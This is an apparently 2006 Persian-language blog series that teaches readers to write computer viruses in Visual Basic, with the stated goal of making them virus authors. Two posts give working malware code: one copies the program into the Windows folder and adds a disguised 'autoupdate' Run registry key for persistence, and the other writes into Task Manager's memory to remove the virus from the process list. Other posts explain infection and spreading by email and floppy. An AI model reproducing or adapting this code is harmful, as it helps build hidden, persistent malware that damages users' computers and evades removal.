ویروس ایرانی

2.مخفی کردن و غیر قابل حذف کردن ویروس(قسمت اول)

در پست قبلی شاید اصلی ترین چیز رو در ویروس نویسی یاد گرفتیم.حال قسمت دوم آموزش رو می خوایم بدیم که اون مخفی کردن ویروسه.مخفی کردن form و مخفی کردن ویروس رو در لیست task های taskmanager یاد گرفتید.حالا می خوایم مخفی کردن ویروس رو در لیست process های taskmanager،آموزش بدیم.هر ویروسی قادر به این کار نیست و فقط ویروس های جدید می تونن این کارو انجام بدن.برای این کار باید ابتدا vb رو اجرا و بعد standard exe رو انتخاب کنیم و سه مرحله کار انجام بدیم:

مرحله ی اول:

اول این کدها رو در قسمت general کپی کنید

Private Type bkh flag As Long psz As Long lParam As Long pt As Long vkDirection As Long End Type Private Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long Private Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Private Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long

مرحله ی دوم:

حالا این کدها رو جدا از قسمت form_load و general کپی کنید که خودش یک قسمت باشه:

Private Sub Hide_Process(Name As String) Dim pName As Long Dim pType As Long Dim l As Long Dim Tid As Long Dim hTid As Long Dim pid As Long Dim h As Long Dim i As Long Dim hProcess As Long Dim f As bkh Dim s As String Dim bkh() As Byte h = FindWindow(vbNullString, "Windows Task Manager") KillTimer h, 0 h = FindWindowEx(h, 0, "#32770", vbNullString) h = FindWindowEx(h, 0, "SysListView32", vbNullString) If h = 0 Then Exit Sub f.flag = 8 Or &H20 Call GetWindowThreadProcessId(h, pid) hProcess = OpenProcess(1082, 0, pid) bkh = StrConv(Name, vbFromUnicode) pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4) WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l f.psz = pName pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4) WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l i = SendMessage(h, &H1000 + 13, 0, pType) If i <> -1 Then SendMessage h, &H1000 + 8, i, 0 VirtualFreeEx hProcess, pType, Len(f), &H8000 VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000 End Sub

مرحله ی سوم:

حال یک timer با interval مناسب(مثلا" 1) درست کنید و کد زیر رو در timer قرار بدید:

Hide_Process CStr(App.EXEName & ".exe")

در این جا باید بگم که منظور از app.exename،نام فایلی ویروس است و اگر نام فایلتان را مثلا" h بذاری،app.exename هم h می شود.حال ما ویروسی رو داریم که در لیست process های taskmanager مخفی است و از حالت اجرا درآوردن ویروس رو بسیار بسیار سخت میکنه.در پست های بعد غیرقابل حذف شدن ویروس رو آموزش میدم.پس تا پست بعدی و مطلب بعدی خداحافظ.

+ نوشته شده در سه شنبه چهاردهم آذر 1385ساعت 22:36 توسط رضا گودرزی |

1.اجرای ویروس در هر بار اجرای ویندوز

یک ویروس برای اینکه بتونه کارهای مخربش رو انجام بده،باید هر لحظه اجرا باشه.یعنی از زمانی که ویندوز بار گزاری میشه تا وقتی که از ویندوز خارج می شویم.هر ویروسی باید خونه ای داشته باشه و تو اونجا زندگی کنه و خونه اش جایی باشه که نه کاربر به اون دسترسی داشته باشه و نه حذف بشه.پس بهترین جا،پوشه ی ویندوز است که بعضی ها از رفتن به آن خودداری می کنند زیرا می ترسن ویندوزشون خراب بشه.خوب،کار بعدی اینه که ویروس،هر بار ویندوز اجرا شد،اجرا بشه که این کمک می کنه تا ویروس،هر کاری بخواد بکنه.اول Visual Basic رو اجرا کنید و بعد standard exe و بعد هم در قسمت form_load کدهای زیر رو بنویسید.

Me.hide App.taskvisible = false Set fso = CreateObject("scripting.filesystemobject") Set windir = fso.getspecialfolder(0) file = App.Path & "\" & App.EXEName & ".exe" FileCopy file, windir & "\" & App.EXEName & ".exe" file2 = windir & "\" & App.EXEName & ".exe" Set Reg = CreateObject("wscript.shell") Reg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\run\autoupdate", file2

اگه از کدهای vb سردر نمیارید براتون توضیح میدم.در خط اول کدی را وارد کردیم که باعث می شود form برنامه،در حین اجرا مخفی باشد و خط دوم باعث می شود تا برنامه،در لیست task های taskmanager مخفی باشد.در پست های بعد،آموزش مخفی کردن ویروس در لیست process های taskmanager رو می دم.در خط سوم،ما شئی fso رو برای دسترسی به فایل ها،فولدرهاو ...به برنامه معرفی کردیم.اگه این کارو نکنیم از قابلیت های این شئی برخوردار نمی شویم.در خط چهارم،از متد getspecialfolder برای بدست آوردن پوشه های حساس ویندوز استفاده می کنیم.اگه به جای صفر،یک بذاریم پوشه ی system 32 را به ما می دهد و اگر 2 بذاریم،پوشه ی temp ویندوز رو میده.در خط پنجم،مسیر فایل خودمون رو بدست آوردیم و اگه این کارو نکنیم،نمی تونیم فایل یا ویروسمون رو کپی کنیم.در خط ششم فایل را کپی کرده و در خط هفتم مسیر فایل کپی شده را به برنامه می دهیم چون برای گذاشتن مسیر فایل در ریجیستری به آن نیاز مندیم و در خط بعدی،شیئی را به برنامه معرفی کرده ایم که باعث می شود بتوانیم به ریجیستری دسترسی داشته یاشیم و در خط آخر هم،مسیر فایل کپی شده را در قسمتی خاص در ریجیستری می گذاریم.ریجیستری مکانی است که حیات ویندوز به آن وابسته است و کارهای اصلی ویندوز به وسیله ی آن صورت می گیرد و برای دسترسی به ریجیستری در run عبارت regedit رو تایپ کنید.امیدوارم از این مطالب،لذت برده باشید.تا پست بعد،خدا حافظ.

+ نوشته شده در دوشنبه سیزدهم آذر 1385ساعت 18:37 توسط رضا گودرزی |

اهداف کلی وبلاگ

خوب،قبل از هر چیز بهتره بگم تو این پست و پست های بعد چی یاد می گیریم

۱.اجرای ویروس در هر بار اجرای ویندوز

2.مخفی کردن و غیر قابل حذف کردن ویروس

3.منتشر کردن ویروس

۴.آلوده کردن فایل ها

۵.ترفند هایی دیگر

اگه با آموزش من در این وبلاگ همراه بشید،حتما" می تونید یک ویروس نویس باشید و در آینده ای نه چندان دور،خودتون وبلاگ آموزش ویروس سازی راه بندازید.در اولین قدم بهتره با این چهار مساله ای که بالا گفته شد،آشنا بشیم و بعدش یک ویروس جامع و کامل با هم می سازیم که تمام این نکات رو دربرداشته باشه.تو پست بعدی با نحوه ی اجرای ویروس در هر بار اجرای ویندوز آشنا می شیم که این یکی از چیزهایی است که هر ویروس نویسی(حرفه ای یا غیر حرفه ای)باید بلد باشه.پس تا پست بعد منتظر باشید.اگه چیز دیگه ای به نظرتون می رسه تو نظر ها بنویسید تا اضافه کنم و منو در آموزش یاری کنید.

+ نوشته شده در یکشنبه دوازدهم آذر 1385ساعت 19:3 توسط رضا گودرزی |

شروع ویروس نویسی

هر کسی بخواد ویروس بنویسه(بسازه)،باید اول بدونه که ویروس چی هست و چی کار می کنه و به همین خاطر در پست های قبلی نوشتم که ویروس ها چی هستن و چی کار می کنن.اگه اونارو نخوندید،حتما" سری بهشون بزنید.اولین چیزی که باید بگم اینه که ما ویروس هایمون رو چطور می سازیم.ویروس ها رو تو این وبلاگ یا با vbs و یا با vb خواهیم ساخت که اول از Visual basic شروع می کنیم.پس حتما" برنامه ی Visual Basic رو تهیه کنید.اگر هم ندارید،منتظر ویروس های vbs باشید چون اونا با notepad ویندوز ساخته میشن.پس تا ساختن ویروس های ویژوآل بیسیک با همدیگه،خداحافظ.

+ نوشته شده در یکشنبه دوازدهم آذر 1385ساعت 18:0 توسط رضا گودرزی |

ویروس های کامپیوتری چگونه منتشر می شوند؟

اگر ویروسی تونایی منتشر کردن خود را داشته باشد،به آن ویروس واگیردار می گوییم.این اصطلاح فقط مختص ویروس های بیولوژیکی نیست و ویروس های کامپیوتری هم به این کار توانا هستند.البته هر کدام از یک طریق این کار را انجام می دهند که رایج ترین آن ها برای سازندگان ویروس،از راه اینترنت است زیرا اینترنت،مانند نامش قادر است تمام کامپیوترهای جهان را به هم متصل کند.پس استفاده از اینترنت برای انتشار ویروس،کار مناسبی است اما در این میان راه های دیگری هم وجود دارد و همان طور که در قسمت پیش گفته شد،از راه آلوده کردن فایل ها،ویروس ها می توانند منتشر شوند.مثلا" فایلی که آلوده شده،به کامپیوتر دیگری منتقل شود و آن را هم آلوده کند و یا خود ویروس به کامپیوتر دیگری راه یابد که این راه یابی می تواند از طریق پست الکترونیکی باشد.با یک مثال،این کار را نشان می دهیم.ویروسی که در یک کامپیوتر وجود دارد،اگر کاربر آن کامپیوتر از برنامه ی Outlook استفاده کند،ویروس با دستکاری این برنامه که برای فرستادن ایمیل استفاده می شود،قادر است به یکی از آن ایمیل هایی که در این برنامه وجود دارد بپیوندد و هنگامی که آن میل که توسط خود کاربر نوشته شده است،فرستاده شد و گیرنده فایل پیوست را در کامپیوترش اجرا کرد،می گوییم که ویروس از راه پست الکترونیک منتشر شده است.باید توجه کرد که ویروس به فایل پیوست آن میل می پیوندد و هر میل،جز نوشته،می تواند حاوی فایل هم باشد.حال در کامپیوتری که گیرنده ی میل و ویروس بود،ویروس مسافر نه تنها کامپیوتر آن فرد را تخریب می کند،بلکه از آنجا به کامپیوترهای دیگری هم سفر می کند و به این صورت ویروس در هزاران کامپیوتر راه می یابد و منتشر می شود.

یکی از راه های دیگر راه یابی ویروس به کامپیوتر های دیگر، انتشار توسط فلاپی است.اگر ویروسی این قابلیت را داشته باشد و به کامپیوترهایی که برای مصرف عموم هستند و فلاپی در آن ها کاربرد بسیار دارد وارد شود،به صدها کامپیوتر دیگر هم انتقال پیدا می کند.به این صورت که اگر کسی داخل کامپیوتر،فلاپی قرار داد،ویروس به طور خودکار،یک کپی از خود را به فلاپی انتقال می دهد.در اینجا باید گفت که اگر ویروسی خود را منتشر نکند،کمتر از ویروس های دیگر قابل توجه است.پس منتشر شدن ویروس،یکی از راه های بسیار موثر در معروف شدن آن است.اگر سری به سایت شرکت های تولید کننده ی آنتی ویروس بزنید،می بینید که ویروس های با انتشار بسیار بالا،در سطر لیست ویروس های خطرناک وجود دارد زیرا اگر چه ممکن است برای یک کامپیوتر،کم خطر باشد اما وقتی وارد کامپیوتر های دیگری شد و چون کامپیوتر های زیادی به آن دچار شده اند،مجموع خطر هایش زیاد می شود و این باعث می شود که این نوع ویروس ها از ویروس هایی که دارای خطر بسیار ولی انتشار کم هستند،خطرناک تر باشند.در بخش بعد،با انواع ویروس آشنا می شویم.

+ نوشته شده در یکشنبه دوازدهم آذر 1385ساعت 14:9 توسط رضا گودرزی |

ویروس های کامپیوتری چگونه فایل ها را آلوده می کنند؟

همانطوری که خداوند،ویروس ها را از جنس خود انسان و موجودات زنده آفرید،ویروس های کامپیوتری هم از چیزی که در خود کامپیوتر وجود دارد ساخته می شود.در واقع اگر بخواهیم ویروس های کامپیوتری را تعریف کنیم می گوییم: "ویروس های کامپیوتری،نرم افزار های بسیار کوچکی هستند که کارهای مخربی انجام می دهند و این کار هایشان طوری است که ما به آن ها لقب ویروس را داده ایم ".حال می خواهیم بگوییم که همان طور که ویروس های بیولوژیکی سلول ها را آلوده می کنند و ویروس های بیولوژیکی از سلول،بسیار کوچک ترند،به همین خاطر به این نرم افزار های کوچک که از فایل هایی که آن ها را آلوده می کنند،کوچک ترند،لقب ویروس را داده ایم.نرم افزار ها، همان فایل ها یا سلول ها هستند و ویروس های کامپیوتری مانند ویروس های انسانی،نرم افزار ها یا فایل های کوچکتری هستند.

شاید با این مطالب،خیلی کم در یافته باشیم که ویروس چیست.همان جوری که ویروس بیولوژیکی وارد سلول ها می شود و ماده ی وراثتی را وارد سلول می کند،ویروس کامپیوتری هم یک نسخه از خود را وارد فایل ها می کند.به فایلی که یک نسخه از ویروس کامپیوتری در ساختار خود دارد را فایل آلوده می گوییم.اگر کمی در این نوشته ها تفکر کنیم،می فهمیم که ساخت یک ویروس کامپیوتری که یک نسخه از خود را مانند ویروس انسانی که ماده ی وراثتی را وارد سلول ها میکند،وارد فایل ها میکند،کار ساده ای نیست.در ضمن،گلبول های سفید یا آنتی ویروس ها،مانع از این کار می شوند ولی ویروس های قوی،بر آنتی ویروس ها هم(گلبول های سفید) غلبه می کنند.

خوب هم اکنون شاید برای شما این سوال که چگونه ویروس های کامپیوتری،یک کپی از خود را وارد یک فایل می کنند،پیش آمده باشد.

هر نرم افزاری که ساخته یا نوشته می شود،دارای کد هاییست که این کدها برای کامپیوتر،به صورت صفر و یک هستند.حال ویروس که می خواهد فایلی را آلوده کند،آن فایل را ویرایش می کند.ویروس،کدهای خود را بدست می آورد و کدهای خود را وارد فایل می کند.به این صورت یک فایل آلود می شود.اگر وارد بحث تخصصی تر آن بشویم،می گوییم که ویروس ها،هر نوع فایلی را آلوده نمی کنند و فقط فایل هایی که قابلیت اجرا شدن به صورت مستقیم یا غیر مستقیم(توسط برنامه ای دیگر،فایل باز شود)را آلوده می کنند.برای همین،ویروسی که قابلیت تشخیص فایل ها از یکدیگر را دارد،موفق تر است و مانند اینکه ویروس فلج اطفال،فقط به سلول های نخاع حمله می کند.در ضمن نحوه ی آلوده کردنشان تفاوت دارد.بعضی از آن ها کد های فایل ها را تماما" پاک می کنند و کد های خود را جایگزین می کنند که در این صورت فایل آلوده شده،قابل درمان توسط آنتی ویروس ها نیست و فایل به طور کامل از بین رفته و به ویروس تبدیل شده است اما شکل ظاهریش باقی می ماند ولی بعضی ها کد های فایل آلوده شده را از بین نمی برند،بلکه کدهای خودشان را کنار کدهای فایل می گذارند.اما در هر دو صورت،هنگامی که فایل در هر کامپیوتری اجرا شد،انگار ویروس اجرا شده است و این یکی از علت هایی است که ویروس نویسان،فایل ها را آلوده می کنند که هم نرم افزاری که ساخته اند ویروس نام گیرد و هم ویروسشان منتشر شود.در بخش بعدی با نحوه ی منتشر شدن ویروس ها آشنا می شویم.

+ نوشته شده در یکشنبه دوازدهم آذر 1385ساعت 14:4 توسط رضا گودرزی |

ویروس های کامپیوتری چه کارهای مخربی انجام می دهند؟

تا به حال در کامپیوتر،ویروسی پیدا نشده که مفید واقع شود.تمام آن ها،آسیب هایی را به کامپیوتر وارد می کنند.فقط روش رساندن آسیب و نوع آسیبشان،با هم تفاوت دارد.البته بیشترشان،تقریبا" تخریب ها ی مشابهی به کامپیوتر وارد می کنند که ین صدمه ها عبارتند از:

1.آلوده کردن فایل ها(اطلاعات)

2.منتشر شدن

3.آسیب های دیگر

اگر ویروسی،آسیب مورد یک و دو،یعنی آلوده کردن فایل ها و منتشر شدن را نداشته باشد،نمی توان نام یک ویروس را روی آن نهاد.البته مورد سوم،برای سازندگان ویروس،اختیاری است ولی اکثر ویروس ها،آن را دارند.در بخش های آینده،درباره ی این کارهای مخرب ویروس ها،توضیح داده شده است.

+ نوشته شده در یکشنبه دوازدهم آذر 1385ساعت 13:17 توسط رضا گودرزی |

ویروس کامپیوتری چیست؟

شاید این که ساختار کامپیوتر،شبیه بدن انسان است را شنیده باشیم.همان طور که موجودات زنده،آلوده به ویروس می شوند(به ویروس های بیولوژیکی)،کامپیوترها هم دچار ویروس می شوند.البته قابل ذکر است که دو نوی ویروس کامپیوتری و بیولوژیکی، تفاوت بسیاری با هم دارند.ویروس های کامپیوتری توسط کابران کامپیوتر یا انسان ها ساخته می شود و ویروس های انسانی هم توسط خالق انسان،یعنی خدا آفریده شده است.پس نتیجه می گیریم که دو نوی ویروس،با هم فرق زیادی دارند.در بخش های بعدی،مطالبی درباره ی ساختار ویروس ها و نحوه ی صدمه رساندنشان به کامپیوتر و طور مبارزه با آن ها،نوشته ایم.

+ نوشته شده در یکشنبه دوازدهم آذر 1385ساعت 13:15 توسط رضا گودرزی |